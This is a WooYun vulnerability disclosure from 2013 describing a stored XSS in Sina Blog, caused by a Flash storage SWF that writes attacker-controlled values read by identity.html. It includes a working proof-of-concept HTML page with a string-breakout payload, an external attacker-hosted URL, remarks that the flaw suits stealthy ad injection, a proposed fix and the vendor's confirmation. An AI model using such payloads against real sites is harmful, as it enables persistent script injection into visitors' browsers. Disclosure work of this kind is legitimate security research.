当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042916

漏洞标题:新浪博客存储型XSS(全部博客可留后门)

相关厂商:新浪

漏洞作者: 多多关照

提交时间:2013-11-14 17:09

修复时间:2013-12-29 17:09

公开时间:2013-12-29 17:09

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-11-14: 细节已通知厂商并且等待厂商处理中
2013-11-14: 厂商已经确认,细节仅向厂商公开
2013-11-24: 细节向核心白帽子及相关领域专家公开
2013-12-04: 细节向普通白帽子公开
2013-12-14: 细节向实习白帽子公开
2013-12-29: 细节向公众公开

简要描述:

不多说。

详细说明:

1. 任意打开新浪博客一个博文页面,例如:http://blog.sina.com.cn/s/blog_d38c52360101nhu0.html
2. 页面都会加载 http://d1.sina.com.cn/litong/zhitou/identity.html
3. identity.html页面会调用 http://d1.sina.com.cn/litong/zhitou/storage.swf,并且会调用以下代码:

var fs = me.getFlashStorage({key:"SinaAdFlashKey"});


4. 反编译 http://d1.sina.com.cn/litong/zhitou/storage.swf ,可见以下代码:

ExternalInterface.addCallback("saveBaseCookie", saveBaseCookie);
ExternalInterface.addCallback("getBaseCookie", getBaseCookie);


5. 基于以上信息,可以得知满足 WooYun: 一个flash的0day导致的淘宝网存储xss(可形成永久后门) 中所描述的利用条件。

漏洞证明:

测试仅chrome下进行。

<html>
<body>
<object id="JSocket" tabindex="-1" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
       <param name="movie" value="http://d1.sina.com.cn/litong/zhitou/storage.swf">
       <param name="allowScriptAccess" value="always">
       <embed name="JSocket" src="http://d1.sina.com.cn/litong/zhitou/storage.swf" width="1" height="1" allowscriptaccess="always" type="application/x-shockwave-flash" pluginspage="http://www.adobe.com/go/getflashplayer">
</object>
<script>
function set(){document['JSocket'].saveBaseCookie('SinaAdFlashKey','aa\\";alert(document.domain);1;//aa');}
setTimeout("set()",5000);
</script>
</body>
</html>


由于identity.html中有以下代码:

var fs = me.getFlashStorage({key:"SinaAdFlashKey"});
            if(fs){
            }else{
                fs = gc;
                me.setFlashStorage({key:"SinaAdFlashKey",value:gc});
            }


利用代码中的 alert(document.domain);1; 中的 1 作为 getBaseCookie('SinaAdFlashKey');函数的返回值,以免 identity.html 中的代码流程覆盖了我们存储在LSO的恶意代码。
---------------------------
新浪博客的用户,在直接或者间接的访问到我们恶意构造的页面后,例如http://itsokla.duapp.com/sinablogxss1.htm,
再访问 新浪的任意博文,都会触发此XSS。

QQ图片20131114170428.jpg

修复方案:


这个XSS本身可能很难对用户自身信息造成大的危害。
不过用来挂广告刷流量之类的,应该还是挺不错的:
1. 恶意代码并非存储在页面之中,隐蔽性极强。
2. 作用范围广,全部博文都会触发。
修复方法:
数据在存入LSO之前,将 \ 过滤。

版权声明:转载请注明来源 多多关照@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2013-11-14 17:31

厂商回复:

感谢关注新浪安全,该问题已经确认,马上安排相关人员修复

最新状态:

暂无